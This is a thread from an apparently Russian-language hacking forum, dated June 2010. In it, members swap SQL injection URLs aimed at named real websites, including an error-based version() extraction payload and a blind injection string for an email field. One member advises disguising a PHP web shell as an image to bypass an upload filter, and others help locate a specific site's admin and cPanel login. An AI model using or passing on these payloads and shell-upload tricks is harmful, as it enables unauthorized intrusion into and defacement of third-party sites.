 |
|
23.06.2010, 15:19
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от Konqi
http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5
а вот так не прокатило
http://www.editrans.de/?view=article&id=-6+or(1,1)=(select+count(0),concat((select+version( )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))from(information_schema.tables)group+by +2)--+
Оно и не удивительно, вопрос на засыпку, почему второй вариант должен был прокатить то?
|
|
|
23.06.2010, 15:22
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 543
С нами:
8885780
Репутация:
672
|
|
Сообщение от DrAssault
Оно и не удивительно, вопрос на засыпку, почему второй вариант должен был прокатить то?
ды сам не знаю,просто так написал..
а вот крутит старым добрым блайнд-ом не охота ((
|
|
|
|
23.06.2010, 16:06
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
[QUOTE="Bramin"]
http://www.elixirherbals.com
|
|
|
|
23.06.2010, 17:02
|
|
Новичок
Регистрация: 17.06.2010
Сообщений: 0
С нами:
8369816
Репутация:
0
|
|
есть админка..заливаю .php шелл не заливается..
долjна бить .jpg или .gif//
пробовал .php.%00jpg а тепер написаваются долjна бить картинка 800х800..
а как обходит ето ?
и пробовал менще размерниы (кб) шелл тоjэ такое..800х800//
|
|
|
|
23.06.2010, 18:44
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от k2b1~
есть админка..заливаю .php шелл не заливается..
долjна бить .jpg или .gif//
пробовал .php.%00jpg а тепер написаваются долjна бить картинка 800х800..
а как обходит ето ?
и пробовал менще размерниы (кб) шелл тоjэ такое..800х800//
Возьми картинку любую, до 800х800, открой блокнотом и в самый конец файла впиши код простого шела, например
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
И попробуй залить. При таком раскладе картинка должна пройти всякие там getimagesize и прочее.
|
|
|
|
23.06.2010, 19:09
|
|
Новичок
Регистрация: 23.06.2010
Сообщений: 2
С нами:
8361686
Репутация:
0
|
|
|
|
|
|
23.06.2010, 19:52
|
|
Новичок
Регистрация: 17.06.2010
Сообщений: 0
С нами:
8369816
Репутация:
0
|
|
Сообщение от m0Hze
Возьми картинку любую, до 800х800, открой блокнотом и в самый конец файла впиши код простого шела, например
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
И попробуй залить. При таком раскладе картинка должна пройти всякие там getimagesize и прочее. pomoq spasib..
|
|
|
|
23.06.2010, 19:53
|
|
Новичок
Регистрация: 17.06.2010
Сообщений: 0
С нами:
8369816
Репутация:
0
|
|
youthparliament.am
админку не моqу наыти..
если кто смоjэт помоqите поялуста..
/admin пробовал.
|
|
|
|
23.06.2010, 19:57
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
blind sql
Всем привет!
Кручу blind вида(в поле ввода мыла):
Код:
la@la.la' and (select if((select user from mysql.user limit 1)='root',1,0))='1
У пользователя есть права на insert/update, если можно, то как изменить запрос, чтобы можно было внести изменения в таблицу.
Ну т.е. я хочу в таблицу с новостями добавить php-код.
Прокатит ли такое?
|
|
|
|
23.06.2010, 20:01
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от k2b1~
youthparliament.am
админку не моqу наыти..
если кто смоjэт помоqите поялуста..
/admin пробовал.
ну как на /admin нет прав, вот попробуй cPanel http://www.youthparliament.am/cpanel/
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2221307){kind=avatar}
Похожие темы
Линейный вид
